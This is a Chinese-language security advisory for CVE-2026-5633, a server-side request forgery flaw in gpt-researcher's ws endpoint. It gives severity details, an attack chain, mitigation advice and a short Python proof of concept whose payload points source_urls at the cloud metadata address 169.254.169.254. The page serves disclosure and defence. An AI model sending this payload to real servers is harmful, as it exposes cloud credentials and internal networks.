IPBUF安全漏洞报告
English
CVE-2026-5633 CVSS 7.3 高危

CVE-2026-5633: gpt-researcher存在SSRF漏洞

披露日期: 2026-04-06
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5633
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
assafelovic gpt-researcher

相关标签

SSRFgpt-researcherServer-Side Request ForgeryHigh SeverityCVE-2026-5633

漏洞概述

assafelovic gpt-researcher 3.4.3及之前版本存在安全漏洞。该漏洞源于ws Endpoint组件对source_urls参数的处理缺乏有效验证,导致服务端请求伪造(SSRF)。攻击者可远程利用此漏洞,无需用户交互即可控制服务器发起恶意请求,目前官方尚未修复。

技术细节

该漏洞位于 assafelovic gpt-researcher 的 ws Endpoint 组件中。由于 `source_urls` 参数未经过滤直接被用于发起服务器端请求,攻击者可以通过构造包含内部地址(如 127.0.0.1、169.254.169.254)的恶意输入来利用此漏洞。CVSS 3.1 评分为 7.3,攻击复杂度低,无需权限和用户交互。成功利用后,攻击者可扫描内网端口、读取云服务元数据或向内部系统发起攻击。目前漏洞利用细节已公开,且厂商尚未响应。

攻击链分析

STEP 1
1. 发现阶段
攻击者识别出目标运行的是 assafelovic gpt-researcher 3.4.3 或更早版本。
STEP 2
2. 漏洞利用
攻击者向 ws Endpoint 发送特制的请求,在 source_urls 参数中注入恶意 URL(例如指向内网服务的地址)。
STEP 3
3. 请求伪造
服务器解析 source_urls 参数,并向攻击者指定的内部地址发起 HTTP 请求。
STEP 4
4. 信息泄露
攻击者利用服务器返回的内容获取敏感信息,如内网拓扑、服务指纹或云平台凭证。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target = "http://vulnerable-host:port/ws_endpoint" # SSRF Payload targeting internal metadata payload = { "source_urls": ["http://169.254.169.254/latest/meta-data/"] } # Send request try: r = requests.post(target, json=payload) print(f"Status: {r.status_code}") print(f"Response: {r.text}") except Exception as e: print(f"Error: {e}")

影响范围

assafelovic gpt-researcher <= 3.4.3

防御指南

临时缓解措施
建议立即在应用防火墙或反向代理层面对 ws Endpoint 接口实施 IP 白名单访问控制。同时,配置服务器出站规则,禁止访问非业务相关的内网地址(如 127.0.0.1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)及云元数据服务地址,以阻断 SSRF 攻击路径。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表